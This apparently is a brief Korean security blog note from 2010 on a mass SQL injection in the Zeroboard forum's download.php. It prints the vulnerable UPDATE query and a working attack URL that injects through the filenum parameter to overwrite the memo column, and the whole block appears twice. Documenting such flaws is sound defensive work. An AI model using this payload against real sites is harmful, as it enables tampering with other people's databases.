vulnerability
Zeroboard에서 발생한 Mass Sql Injection
applicationlayer
2010. 1. 26. 18:01
참고: http://www.securityplus.or.kr/xe/?document_srl=17273&vid=bangrip1
취약쿼리실행
update zetyx_board_id set downloadXXX=downloadXXX+1 where no='6'
공격문
download.php?id=id&filenum=1=download1,memo= concat(char(67),char(79),char(68),char(69))%23&no=6
1=download1 의 경우 임의의 문자삽입 가능
예)
2=111
취약쿼리실행
update zetyx_board_id set downloadXXX=downloadXXX+1 where no='6'
공격문
download.php?id=id&filenum=1=download1,memo= concat(char(67),char(79),char(68),char(69))%23&no=6
1=download1 의 경우 임의의 문자삽입 가능
예)
2=111